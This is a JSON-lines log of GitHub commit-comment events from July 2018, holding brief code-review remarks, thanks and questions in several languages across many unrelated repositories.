{"id":"7943347688","type":"CommitCommentEvent","actor":{"login":"ad-m"},"repo":{"name":"hyperonecom/h1-cli"},"payload":{"comment":{"id":29655372,"position":4,"line":8,"path":"docs/firewall.md","commit_id":"e694d73d038231ea7860e271c18dd08ceb03e7a3","created_at":"2018-07-10T12:06:46Z","updated_at":"2018-07-10T12:06:46Z","author_association":"COLLABORATOR","body":"Fixed in https://github.com/hyperonecom/h1-cli/pull/130 ."}},"created_at":"2018-07-10T12:06:46Z"}
{"id":"7943349449","type":"CommitCommentEvent","actor":{"login":"smotornyuk"},"repo":{"name":"ckan/ckan"},"payload":{"comment":{"id":29655378,"position":9,"line":15,"path":"CHANGELOG.rst","commit_id":"3f335705243bedf19e7b87bf9e2fe9a8f2abace6","created_at":"2018-07-10T12:07:10Z","updated_at":"2018-07-10T12:07:10Z","author_association":"MEMBER","body":"Yep, exactly:)"}},"created_at":"2018-07-10T12:07:10Z"}
{"id":"7943349686","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29655379,"position":72,"line":66,"path":"3-25/3-25.cpp","commit_id":"6bd6f175571d0963c3cab2a113234d4d24f04f9f","created_at":"2018-07-10T12:07:13Z","updated_at":"2018-07-10T12:07:13Z","author_association":"COLLABORATOR","body":"gotoの使用は禁止でお願いします。(石井)"}},"created_at":"2018-07-10T12:07:13Z"}
{"id":"7943355521","type":"CommitCommentEvent","actor":{"login":"arnoalexander"},"repo":{"name":"gilangardya/IF2210_Pemrograman-Berorientasi-Objek_Tugas-Besar-2"},"payload":{"comment":{"id":29655386,"position":null,"line":null,"path":null,"commit_id":"77ebd8e6f31ad4f0c367c9bda4c977ed43c64d7f","created_at":"2018-07-10T12:08:29Z","updated_at":"2018-07-10T12:08:29Z","author_association":"COLLABORATOR","body":"Aib tetap akan terlihat di commit sebelumnya"}},"created_at":"2018-07-10T12:08:29Z"}
{"id":"7943355585","type":"CommitCommentEvent","actor":{"login":"NicklasVraa"},"repo":{"name":"NicklasVraa/nv-dark-syntax"},"payload":{"comment":{"id":29655387,"position":null,"line":null,"path":null,"commit_id":"e045d924d5289228e96634ff3004db54387064f6","created_at":"2018-07-10T12:08:29Z","updated_at":"2018-07-10T12:08:29Z","author_association":"OWNER","body":"tir. 10. jul. 2018 kl. 14.05 skrev Tha14 <notifications@github.com>:\n\n> Hi, I really like this syntax theme. The highlighting is way better now. I\n> am using a dynamic background on my atom and comments as well as the\n> highlights are not very visible.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/NicklasVraa/nv-dark-syntax/commit/e045d924d5289228e96634ff3004db54387064f6#commitcomment-29655350>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AV0xtyWldwZwf731gPAYP1Cw2vfXNLN-ks5uFJhzgaJpZM4VJRyz>\n> .\n>\nThanks, man :) Feel free to fork and tweak it to your liking. I made it\nspecifically for my personal setup.\n"}},"created_at":"2018-07-10T12:08:29Z"}
{"id":"7943363102","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"timelyportfolio/r-spatial.org"},"payload":{"comment":{"id":29655398,"position":null,"line":null,"path":null,"commit_id":"12117512c8f104f2c60f013020beac5eb2ab138a","created_at":"2018-07-10T12:10:08Z","updated_at":"2018-07-10T12:10:08Z","author_association":"OWNER","body":"@tim-salabim, I changed the date to 2018-07-15 and made minor changes to address comments.  Will you please check again?  Thanks!"}},"created_at":"2018-07-10T12:10:08Z"}
{"id":"7943368208","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-sawa/meikai_cpp_sawa"},"payload":{"comment":{"id":29655409,"position":28,"line":32,"path":"3-25/3-25.cpp","commit_id":"6bd6f175571d0963c3cab2a113234d4d24f04f9f","created_at":"2018-07-10T12:11:09Z","updated_at":"2018-07-10T12:11:09Z","author_association":"COLLABORATOR","body":"ノイズになるので、実際に使い始める直前までは変数宣言をしないように心がけましょう。(石井)"}},"created_at":"2018-07-10T12:11:09Z"}
{"id":"7943370655","type":"CommitCommentEvent","actor":{"login":"firoball"},"repo":{"name":"Acknex/LotterShock"},"payload":{"comment":{"id":29655414,"position":null,"line":null,"path":null,"commit_id":"d5ece1204d007b3f646517cb31ce0cc385bcc893","created_at":"2018-07-10T12:11:38Z","updated_at":"2018-07-10T12:11:38Z","author_association":"CONTRIBUTOR","body":"Da ich gerade nicht committen kann, hier noch Verbesserungsvorschläge:\r\n\r\n1. real,- kann imho raus, finde das eher peinlich mittlerweile\r\n2. Es heißt \"Many thanks\"\r\n3. der korrekte Name lautet \"oP Group Germany\""}},"created_at":"2018-07-10T12:11:38Z"}
{"id":"7943371982","type":"CommitCommentEvent","actor":{"login":"joakim-noah"},"repo":{"name":"ldc-developers/druntime"},"payload":{"comment":{"id":29655417,"position":34,"line":215,"path":"src/rt/sections_android.d","commit_id":"5f7f87391bc8189500925adc938b257631352916","created_at":"2018-07-10T12:11:54Z","updated_at":"2018-07-10T12:11:54Z","author_association":"MEMBER","body":"OK, I'll take a look, it's a good idea."}},"created_at":"2018-07-10T12:11:54Z"}
{"id":"7943374201","type":"CommitCommentEvent","actor":{"login":"ayhanselek"},"repo":{"name":"ayhanselek/GitTest"},"payload":{"comment":{"id":29655421,"position":4,"line":4,"path":"abc.txt","commit_id":"b82dc59780f59f131e1f9eadde92154430cf7e2b","created_at":"2018-07-10T12:12:21Z","updated_at":"2018-07-10T12:12:21Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-10T12:12:21Z"}
{"id":"7943374539","type":"CommitCommentEvent","actor":{"login":"LeonWubben"},"repo":{"name":"StephanieWehner/SimulaQron"},"payload":{"comment":{"id":29655423,"position":1,"line":42,"path":"cqc/backend/cqcMessageHandler.py","commit_id":"3733530ad1fefd4eb5ed8efa702c0fed46b13a3b","created_at":"2018-07-10T12:12:25Z","updated_at":"2018-07-10T12:12:25Z","author_association":"COLLABORATOR","body":"I accidentally changed all tab indents to 4 spaces here.."}},"created_at":"2018-07-10T12:12:25Z"}
{"id":"7943375723","type":"CommitCommentEvent","actor":{"login":"ayhanselek"},"repo":{"name":"ayhanselek/GitTest"},"payload":{"comment":{"id":29655426,"position":4,"line":4,"path":"abc.txt","commit_id":"b82dc59780f59f131e1f9eadde92154430cf7e2b","created_at":"2018-07-10T12:12:40Z","updated_at":"2018-07-10T12:12:40Z","author_association":"OWNER","body":"bunu neden ekledin 444 olmayacaktı"}},"created_at":"2018-07-10T12:12:40Z"}
{"id":"7943377468","type":"CommitCommentEvent","actor":{"login":"ayhanselek"},"repo":{"name":"ayhanselek/GitTest"},"payload":{"comment":{"id":29655429,"position":4,"line":4,"path":"abc.txt","commit_id":"b82dc59780f59f131e1f9eadde92154430cf7e2b","created_at":"2018-07-10T12:13:03Z","updated_at":"2018-07-10T12:13:03Z","author_association":"OWNER","body":"adam gibi yazın şu kodları diyoruz\r\n"}},"created_at":"2018-07-10T12:13:03Z"}
{"id":"7943381002","type":"CommitCommentEvent","actor":{"login":"krasCGQ"},"repo":{"name":"PaulSonOfLars/tgbot"},"payload":{"comment":{"id":29655433,"position":null,"line":null,"path":null,"commit_id":"db6f37a41121f7e1e490708ec559633f322ad362","created_at":"2018-07-10T12:13:47Z","updated_at":"2018-07-10T12:13:47Z","author_association":"NONE","body":"Nice way of leaking your bot API key 🤣🤣"}},"created_at":"2018-07-10T12:13:47Z"}
{"id":"7943381396","type":"CommitCommentEvent","actor":{"login":"prestamodule"},"repo":{"name":"PrestaShop/PrestaShop"},"payload":{"comment":{"id":29655434,"position":null,"line":null,"path":null,"commit_id":"f6a82b28d891a3b0a5330abf30bbb8e567201555","created_at":"2018-07-10T12:13:51Z","updated_at":"2018-07-10T12:13:51Z","author_association":"CONTRIBUTOR","body":"@alegout @Quetzacoalt91 We've opened a PR to fix this https://github.com/PrestaShop/PrestaShop/pull/9297"}},"created_at":"2018-07-10T12:13:51Z"}
{"id":"7943382371","type":"CommitCommentEvent","actor":{"login":"ayhanselek"},"repo":{"name":"ayhanselek/GitTest"},"payload":{"comment":{"id":29655438,"position":2,"line":2,"path":"HackedByArifKüçük.txt","commit_id":"3ff6f13f4606c5bfaa7eb8e488a77a584d8b69d5","created_at":"2018-07-10T12:14:04Z","updated_at":"2018-07-10T12:14:04Z","author_association":"OWNER","body":"Dalga mı geçiyonuz "}},"created_at":"2018-07-10T12:14:04Z"}
{"id":"7943391164","type":"CommitCommentEvent","actor":{"login":"kjeldflarup"},"repo":{"name":"labgrid-project/labgrid"},"payload":{"comment":{"id":29655457,"position":4,"line":104,"path":"labgrid/driver/sshdriver.py","commit_id":"1f89ed9f4e10b0773870105ee31df8a208593121","created_at":"2018-07-10T12:15:49Z","updated_at":"2018-07-10T12:15:49Z","author_association":"CONTRIBUTOR","body":"decodererrors should be decodeerrors"}},"created_at":"2018-07-10T12:15:49Z"}
{"id":"7943393396","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/products"},"payload":{"comment":{"id":29655464,"position":null,"line":null,"path":null,"commit_id":"68d20ddc4f47c3d73d6e22bb38cf5cf789bfa69d","created_at":"2018-07-10T12:16:15Z","updated_at":"2018-07-10T12:16:15Z","author_association":"OWNER","body":"WOW\r\n"}},"created_at":"2018-07-10T12:16:15Z"}
{"id":"7943393820","type":"CommitCommentEvent","actor":{"login":"jakethakur22"},"repo":{"name":"jakethakur22/AUV-Project"},"payload":{"comment":{"id":29655468,"position":null,"line":null,"path":null,"commit_id":"1af5440ab4d3504ebd299b2a306c21d27b279c60","created_at":"2018-07-10T12:16:20Z","updated_at":"2018-07-10T12:16:20Z","author_association":"OWNER","body":"http://www.instructables.com/id/How-to-communicate-with-Arduino-using-HTML-Chrome/ FMI"}},"created_at":"2018-07-10T12:16:20Z"}
{"id":"7943393868","type":"CommitCommentEvent","actor":{"login":"kjeldflarup"},"repo":{"name":"labgrid-project/labgrid"},"payload":{"comment":{"id":29655469,"position":7,"line":107,"path":"labgrid/driver/sshdriver.py","commit_id":"1f89ed9f4e10b0773870105ee31df8a208593121","created_at":"2018-07-10T12:16:21Z","updated_at":"2018-07-10T12:16:21Z","author_association":"CONTRIBUTOR","body":"timeout is missing"}},"created_at":"2018-07-10T12:16:21Z"}
{"id":"7943393997","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/products"},"payload":{"comment":{"id":29655470,"position":null,"line":null,"path":null,"commit_id":"68d20ddc4f47c3d73d6e22bb38cf5cf789bfa69d","created_at":"2018-07-10T12:16:22Z","updated_at":"2018-07-10T12:16:22Z","author_association":"OWNER","body":"OMG"}},"created_at":"2018-07-10T12:16:22Z"}
{"id":"7943395663","type":"CommitCommentEvent","actor":{"login":"kjeldflarup"},"repo":{"name":"labgrid-project/labgrid"},"payload":{"comment":{"id":29655477,"position":null,"line":null,"path":null,"commit_id":"1f89ed9f4e10b0773870105ee31df8a208593121","created_at":"2018-07-10T12:16:42Z","updated_at":"2018-07-10T12:16:42Z","author_association":"CONTRIBUTOR","body":"This commit breaks the SSHDriver"}},"created_at":"2018-07-10T12:16:42Z"}
{"id":"7943395930","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655478,"position":151,"line":151,"path":"odoo/addons/test_read_group/tests/test_fill_temporal.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:16:45Z","updated_at":"2018-07-10T12:16:45Z","author_association":"MEMBER","body":"avoid `print` here"}},"created_at":"2018-07-10T12:16:45Z"}
{"id":"7943396602","type":"CommitCommentEvent","actor":{"login":"ayhanselek"},"repo":{"name":"ayhanselek/GitTest"},"payload":{"comment":{"id":29655481,"position":16,"line":9,"path":"README.md","commit_id":"4a1b0c268151e024a81fa7a59918a42bf52bace5","created_at":"2018-07-10T12:16:54Z","updated_at":"2018-07-10T12:16:54Z","author_association":"OWNER","body":"@emreakd @Junefear @mustafatoptas arkadaslar burdaki linkleri eksik olan kişiler acil düzenlesin çok acil"}},"created_at":"2018-07-10T12:16:54Z"}
{"id":"7943398846","type":"CommitCommentEvent","actor":{"login":"emreakd"},"repo":{"name":"ayhanselek/GitTest"},"payload":{"comment":{"id":29655488,"position":3,"line":1,"path":"HackedByMustafaToptas!.txt","commit_id":"033c6a4cb282077f5388555fa001bc4bc09254e9","created_at":"2018-07-10T12:17:21Z","updated_at":"2018-07-10T12:17:21Z","author_association":"COLLABORATOR","body":"."}},"created_at":"2018-07-10T12:17:21Z"}
{"id":"7943399354","type":"CommitCommentEvent","actor":{"login":"dm4uz3"},"repo":{"name":"ToppleKek/discord-rhythmbox-plugin"},"payload":{"comment":{"id":29655489,"position":null,"line":null,"path":null,"commit_id":"7bd4542cba6a79e9e12069c0960cf50a1fd231b1","created_at":"2018-07-10T12:17:27Z","updated_at":"2018-07-10T12:17:27Z","author_association":"NONE","body":"more understandable have a good day"}},"created_at":"2018-07-10T12:17:27Z"}
{"id":"7943401908","type":"CommitCommentEvent","actor":{"login":"emreakd"},"repo":{"name":"ayhanselek/GitTest"},"payload":{"comment":{"id":29655502,"position":2,"line":2,"path":"HackedByArifKüçük.txt","commit_id":"3ff6f13f4606c5bfaa7eb8e488a77a584d8b69d5","created_at":"2018-07-10T12:17:57Z","updated_at":"2018-07-10T12:17:57Z","author_association":"COLLABORATOR","body":"?"}},"created_at":"2018-07-10T12:17:57Z"}
{"id":"7943405703","type":"CommitCommentEvent","actor":{"login":"mickaelandrieu"},"repo":{"name":"mickaelandrieu/PrestaShop"},"payload":{"comment":{"id":29655512,"position":15,"line":77,"path":"tools/build/Library/Version.php","commit_id":"999db695df88cb89b6ecc4c2cb993790c3b764ef","created_at":"2018-07-10T12:18:44Z","updated_at":"2018-07-10T12:18:44Z","author_association":"OWNER","body":"<3"}},"created_at":"2018-07-10T12:18:44Z"}
{"id":"7943407380","type":"CommitCommentEvent","actor":{"login":"ArtoLabs"},"repo":{"name":"ArtoLabs/SteemAX"},"payload":{"comment":{"id":29655517,"position":null,"line":null,"path":null,"commit_id":"c25b0db0bda74e4d7c99519a279166d27a7601c5","created_at":"2018-07-10T12:19:08Z","updated_at":"2018-07-10T12:19:08Z","author_association":"OWNER","body":"Additionally I added exception handling to the file handler as well as added screen logger for error logging."}},"created_at":"2018-07-10T12:19:08Z"}
{"id":"7943408348","type":"CommitCommentEvent","actor":{"login":"Zaf9670"},"repo":{"name":"prusa3d/Prusa-Firmware"},"payload":{"comment":{"id":29655520,"position":null,"line":null,"path":null,"commit_id":"771cead291626113a38f2fbfd0ec634fee7376ac","created_at":"2018-07-10T12:19:19Z","updated_at":"2018-07-10T12:19:19Z","author_association":"NONE","body":"Is there a plan to release a guide on how to calibrate the other axes?"}},"created_at":"2018-07-10T12:19:19Z"}
{"id":"7943413813","type":"CommitCommentEvent","actor":{"login":"ArtoLabs"},"repo":{"name":"ArtoLabs/SteemAX"},"payload":{"comment":{"id":29655532,"position":null,"line":null,"path":null,"commit_id":"f957b3a84648e5f67011cb931bc6f53355e8e98e","created_at":"2018-07-10T12:20:25Z","updated_at":"2018-07-10T12:20:25Z","author_association":"OWNER","body":"I also rearranged the order of the classes so that like definitions were closer to each other. Sorry for the confusing commit."}},"created_at":"2018-07-10T12:20:25Z"}
{"id":"7943417063","type":"CommitCommentEvent","actor":{"login":"ArtoLabs"},"repo":{"name":"ArtoLabs/SteemAX"},"payload":{"comment":{"id":29655537,"position":null,"line":null,"path":null,"commit_id":"77ca57e2a4d84f621289aa225cb7ff3682583470","created_at":"2018-07-10T12:21:04Z","updated_at":"2018-07-10T12:21:04Z","author_association":"OWNER","body":"I will be removing even more fonts soon. There should really only be a couple defined here."}},"created_at":"2018-07-10T12:21:04Z"}
{"id":"7943417634","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655538,"position":339,"line":339,"path":"odoo/addons/test_read_group/tests/test_fill_temporal.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:21:11Z","updated_at":"2018-07-10T12:21:11Z","author_association":"MEMBER","body":"possible code deduplication:\r\n```python\r\n# without holes\r\nexpected = [...]\r\n\r\n# case with fill_temporal=False\r\nself.assertEqual(groups, [group for group in expected if group['date_count']])\r\n\r\n# case with fill_temporal=True\r\nself.assertEqual(groups, expected)\r\n```"}},"created_at":"2018-07-10T12:21:11Z"}
{"id":"7943422101","type":"CommitCommentEvent","actor":{"login":"ArtoLabs"},"repo":{"name":"ArtoLabs/SteemAX"},"payload":{"comment":{"id":29655551,"position":null,"line":null,"path":null,"commit_id":"80e2ca8ce76df78977a6e73b9b44a9f5c31fb4be","created_at":"2018-07-10T12:22:03Z","updated_at":"2018-07-10T12:22:03Z","author_association":"OWNER","body":"I also changed the default of the logpath to a string."}},"created_at":"2018-07-10T12:22:03Z"}
{"id":"7943423542","type":"CommitCommentEvent","actor":{"login":"jarlebring"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29655555,"position":51,"line":95,"path":"src/method_iar.jl","commit_id":"6554628cb1a5d91d5c1c622cd44d271f7908e3e4","created_at":"2018-07-10T12:22:20Z","updated_at":"2018-07-10T12:22:20Z","author_association":"CONTRIBUTOR","body":"PolyeigInnerSolver is hardcoded... Should be changed to a parameter so we can run it efficiently."}},"created_at":"2018-07-10T12:22:20Z"}
{"id":"7943423898","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29655558,"position":null,"line":null,"path":null,"commit_id":"aee1825b85c2ae7495061d71382d73f77d04ca42","created_at":"2018-07-10T12:22:25Z","updated_at":"2018-07-10T12:22:25Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `e5dc0aac-843b-11e8-8aa4-b878d99bb032`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T12:22:25Z"}
{"id":"7943424223","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29655562,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-10T12:22:28Z","updated_at":"2018-07-10T12:22:28Z","author_association":"OWNER","body":"\r\n[f10072018055212_download.txt](https://github.com/githubuserdlp/TEST/files/2180299/f10072018055212_download.txt)\r\n"}},"created_at":"2018-07-10T12:22:28Z"}
{"id":"7943459812","type":"CommitCommentEvent","actor":{"login":"rave991"},"repo":{"name":"behumble/showlicense"},"payload":{"comment":{"id":29655646,"position":5,"line":6,"path":"README.md","commit_id":"364785ad0a98a325367e57a845766794d14d0a14","created_at":"2018-07-10T12:29:26Z","updated_at":"2018-07-10T12:29:26Z","author_association":"NONE","body":"Update"}},"created_at":"2018-07-10T12:29:26Z"}
{"id":"7943461083","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655653,"position":727,"line":727,"path":"odoo/addons/test_read_group/tests/test_fill_temporal.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:29:41Z","updated_at":"2018-07-10T12:29:41Z","author_association":"MEMBER","body":"Is it broken? If so, you can decorate the test method to skip it, with a reason:\r\n```python\r\n@unittest.skip(\"Needs to be fixed.\")\r\ndef test_foo(self):\r\n    ...\r\n```"}},"created_at":"2018-07-10T12:29:41Z"}
{"id":"7943463069","type":"CommitCommentEvent","actor":{"login":"maksimbaidak"},"repo":{"name":"maksimbaidak/open"},"payload":{"comment":{"id":29655656,"position":null,"line":null,"path":null,"commit_id":"909ed06c9e4c9dbb36dc1c7a932a5c4aedc0a914","created_at":"2018-07-10T12:30:04Z","updated_at":"2018-07-10T12:30:04Z","author_association":"OWNER","body":"\r\nfirst"}},"created_at":"2018-07-10T12:30:04Z"}
{"id":"7943467632","type":"CommitCommentEvent","actor":{"login":"dokaspar"},"repo":{"name":"SonarSource/sonar-scm-svn"},"payload":{"comment":{"id":29655673,"position":null,"line":null,"path":null,"commit_id":"a97cda218a9cf6d2ed455a32cd429c18dcc2b732","created_at":"2018-07-10T12:30:54Z","updated_at":"2018-07-10T12:30:54Z","author_association":"NONE","body":"Thanks for the update!\r\nDo you have any idea when this change could make it into a release?"}},"created_at":"2018-07-10T12:30:54Z"}
{"id":"7943476465","type":"CommitCommentEvent","actor":{"login":"OrenMe"},"repo":{"name":"kaltura/playkit-js-youbora"},"payload":{"comment":{"id":29655692,"position":13,"line":46,"path":"src/adapter/adapter.js","commit_id":"d21de377662b0c1f191896b5826aee656bee6a37","created_at":"2018-07-10T12:32:35Z","updated_at":"2018-07-10T12:32:35Z","author_association":"COLLABORATOR","body":"so just for getting less `return` statements do:\r\n```javascript\r\nif (activeVideo && !isNaN(activeVideo.bandwidth)) {\r\n   return youbora.Util.buildRenditionString(activeVideo.width, activeVideo.height, activeVideo.bandwidth)\r\n}\r\nreturn null;\r\n```\r\n\r\nI think you should also check for width/height as well in this case."}},"created_at":"2018-07-10T12:32:35Z"}
{"id":"7943478015","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29655697,"position":null,"line":null,"path":null,"commit_id":"ad741551efb9af15fc230b8837e01c0eef8bd6b6","created_at":"2018-07-10T12:32:54Z","updated_at":"2018-07-10T12:32:54Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-114](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-114).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-114-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-10T12:32:54Z"}
{"id":"7943479737","type":"CommitCommentEvent","actor":{"login":"OrenMe"},"repo":{"name":"kaltura/playkit-js-youbora"},"payload":{"comment":{"id":29655702,"position":13,"line":46,"path":"src/adapter/adapter.js","commit_id":"d21de377662b0c1f191896b5826aee656bee6a37","created_at":"2018-07-10T12:33:15Z","updated_at":"2018-07-10T12:33:15Z","author_association":"COLLABORATOR","body":"BTW, issue is that in Safari the browser doesn't provide any rendition info for the currently selected track."}},"created_at":"2018-07-10T12:33:15Z"}
{"id":"7943484316","type":"CommitCommentEvent","actor":{"login":"CatalinFrancu"},"repo":{"name":"dexonline/dexonline"},"payload":{"comment":{"id":29655713,"position":null,"line":null,"path":null,"commit_id":"ebfaa70dffc8df2d0b9f547a0d24aff4d8ad92da","created_at":"2018-07-10T12:34:09Z","updated_at":"2018-07-10T12:34:09Z","author_association":"MEMBER","body":":+1: Și pe mine mă enerva lipsa!"}},"created_at":"2018-07-10T12:34:09Z"}
{"id":"7943484597","type":"CommitCommentEvent","actor":{"login":"XaviRT"},"repo":{"name":"XaviRT/CreandoCuestionario"},"payload":{"comment":{"id":29655716,"position":null,"line":null,"path":null,"commit_id":"12c7ce66d917e8d26055cd90af74617de20234b6","created_at":"2018-07-10T12:34:11Z","updated_at":"2018-07-10T12:34:11Z","author_association":"OWNER","body":"ES DECIR, me peta cuando trato de pasar de la Actividad núm.2 a la Actividad 3, en la que aparecían las 3 preguntas, en principio. A eso me refiero"}},"created_at":"2018-07-10T12:34:11Z"}
{"id":"7943489929","type":"CommitCommentEvent","actor":{"login":"facetoe"},"repo":{"name":"jorijinnall/zenpy"},"payload":{"comment":{"id":29655732,"position":1,"line":1,"path":"specification/zendesk/jiralink.json","commit_id":"54868e319641ae305bde09e9568c2a6bc605faf7","created_at":"2018-07-10T12:35:11Z","updated_at":"2018-07-10T12:35:11Z","author_association":"CONTRIBUTOR","body":"Should call this file `link.json`. That way it will be generated with the correct class name and everything should work as expected."}},"created_at":"2018-07-10T12:35:11Z"}
{"id":"7943490527","type":"CommitCommentEvent","actor":{"login":"tobyjsullivan"},"repo":{"name":"WeAreRust/Nes"},"payload":{"comment":{"id":29655733,"position":7,"line":11,"path":"Cargo.toml","commit_id":"d3b3f15cdd520fa2dbf7c36d8531600a746a27d5","created_at":"2018-07-10T12:35:17Z","updated_at":"2018-07-10T12:35:17Z","author_association":"NONE","body":"@joshleeb I can't figure out how we're supposed to use the libs when bin is in a child directory. Should the bin be at the root level or is there a good way to solve this (without making each lib a crate)?"}},"created_at":"2018-07-10T12:35:17Z"}
{"id":"7943492175","type":"CommitCommentEvent","actor":{"login":"facetoe"},"repo":{"name":"jorijinnall/zenpy"},"payload":{"comment":{"id":29655739,"position":4,"line":394,"path":"zenpy/lib/api.py","commit_id":"54868e319641ae305bde09e9568c2a6bc605faf7","created_at":"2018-07-10T12:35:35Z","updated_at":"2018-07-10T12:35:35Z","author_association":"CONTRIBUTOR","body":"Will need to be `_get_link`."}},"created_at":"2018-07-10T12:35:35Z"}
{"id":"7943493987","type":"CommitCommentEvent","actor":{"login":"facetoe"},"repo":{"name":"jorijinnall/zenpy"},"payload":{"comment":{"id":29655741,"position":10,"line":97,"path":"zenpy/lib/mapping.py","commit_id":"54868e319641ae305bde09e9568c2a6bc605faf7","created_at":"2018-07-10T12:35:55Z","updated_at":"2018-07-10T12:35:55Z","author_association":"CONTRIBUTOR","body":"Also needs to be `link`"}},"created_at":"2018-07-10T12:35:55Z"}
{"id":"7943495612","type":"CommitCommentEvent","actor":{"login":"YangYangXun"},"repo":{"name":"YangYangXun/php_CmsBlog"},"payload":{"comment":{"id":29655745,"position":null,"line":null,"path":null,"commit_id":"14b4aa98deada3c505d2a3ee5263e2c5dd7c83ef","created_at":"2018-07-10T12:36:13Z","updated_at":"2018-07-10T12:36:13Z","author_association":"OWNER","body":"add edit and update function"}},"created_at":"2018-07-10T12:36:13Z"}
{"id":"7943498923","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655753,"position":24,"line":86,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:36:48Z","updated_at":"2018-07-10T12:36:48Z","author_association":"MEMBER","body":"This one is not correct, IMO.\r\nSimply copy the code that does something similar for other fields https://github.com/odoo/odoo/blob/aac843df1740e6dc36f83f7c52ba5a9b41647b2f/odoo/models.py#L1684"}},"created_at":"2018-07-10T12:36:48Z"}
{"id":"7943499640","type":"CommitCommentEvent","actor":{"login":"sagawaharuhide"},"repo":{"name":"sagawaharuhide/git-app"},"payload":{"comment":{"id":29655755,"position":3,"line":3,"path":"app/assets/stylesheets/articles.scss","commit_id":"315df9b8b56968019fa27f3342a5a77e1427b2fa","created_at":"2018-07-10T12:36:56Z","updated_at":"2018-07-10T12:36:56Z","author_association":"OWNER","body":"不要なファイルは削除してしまいましょう。"}},"created_at":"2018-07-10T12:36:56Z"}
{"id":"7943506560","type":"CommitCommentEvent","actor":{"login":"SoniaNali"},"repo":{"name":"SoniaNali/Olympics-Medals-2016-Test"},"payload":{"comment":{"id":29655765,"position":null,"line":null,"path":null,"commit_id":"bc7b2a4318350f7a2109eed0570a83fa32cb29d2","created_at":"2018-07-10T12:38:14Z","updated_at":"2018-07-10T12:38:14Z","author_association":"OWNER","body":"@cihanaygunes Thank you. It's nice to hear :)"}},"created_at":"2018-07-10T12:38:14Z"}
{"id":"7943506634","type":"CommitCommentEvent","actor":{"login":"sarthou"},"repo":{"name":"DavidTrimoulet/PR2-Kinetic-Xenial"},"payload":{"comment":{"id":29655766,"position":68,"line":68,"path":"src/robosherlock/cmake/robosherlock.cmake","commit_id":"80943b476f6018fdccf49dbc6c9e7c82ea40bc56","created_at":"2018-07-10T12:38:15Z","updated_at":"2018-07-10T12:38:15Z","author_association":"NONE","body":"It can not work on another computer than yours with hard directories:\r\nuse `PROJECT_SOURCE_DIR` if possible"}},"created_at":"2018-07-10T12:38:15Z"}
{"id":"7943508133","type":"CommitCommentEvent","actor":{"login":"macite"},"repo":{"name":"doubtfire-lms/doubtfire-web"},"payload":{"comment":{"id":29655772,"position":5,"line":22,"path":"src/app/units/modals/unit-student-enrolment-modal/unit-student-enrolment-modal.tpl.html","commit_id":"7b657a2bb22f0d04771ac7cbdde58371c7dcd79b","created_at":"2018-07-10T12:38:32Z","updated_at":"2018-07-10T12:38:32Z","author_association":"MEMBER","body":"I often enrol students without a tutorial... do we need to disable this?"}},"created_at":"2018-07-10T12:38:32Z"}
